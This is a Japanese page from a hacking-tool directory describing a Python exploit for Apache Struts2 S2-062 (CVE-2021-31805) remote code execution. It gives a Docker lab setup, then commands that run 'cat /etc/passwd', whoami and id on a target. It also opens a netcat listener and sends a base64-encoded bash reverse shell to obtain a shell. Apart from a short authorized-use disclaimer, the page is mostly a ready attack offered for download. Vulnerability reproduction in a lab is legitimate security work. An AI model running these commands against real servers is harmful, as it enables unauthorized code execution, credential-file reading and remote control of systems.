Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Struts2_S2-062_CVE-2021-31805 — Python製のApache Struts2 S2-062(CVE-2021-31805)リモートコード実行エクスプロイト。Dockerベースの再現環境とリバースシェルペイロード生成を備えています。 | Kitploit
ツール/GitHubGitHub/secnn/struts2_s2-062_cve-2021-31805
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubsecnn/struts2_s2-062_cve-2021-31805

Struts2_S2-062_CVE-2021-31805

Python製のApache Struts2 S2-062(CVE-2021-31805)リモートコード実行エクスプロイト。Dockerベースの再現環境とリバースシェルペイロード生成を備えています。

リポジトリを見る
115134年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Struts2_S2-062_CVE-2021-31805

Apache Struts2 S2-062 リモートコード実行脆弱性(CVE-2021-31805) | リバースシェル

脆弱性再現環境

docker-compose.yml

version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

イメージをプルして環境を起動

docker-compose up -d

アクセス先:http://1.1.1.1:8080

脆弱性検証スクリプト

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

passwd

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

root

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

id

リバースシェル

NCでポートリスニングを開始

nc -lvvp 8081

NC

base64エンコードされたリバースシェルスクリプトを構築し、以下のサイトを利用して生成:https://ir0ny.top/pentest/reverse-encoder-shell.html base64

シェルを取得

python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"

shell

シェルの取得に成功

Shell_code

免責事項

不正な用途には使用しないでください。セキュリティテストのみを目的としており、それ以外の用途で生じた結果については本プロジェクトは一切関与しません。 注:正規の許可を得た上でサイトをテストしてください:許可なく攻撃すれば、親は涙を流す。

ツールをダウンロード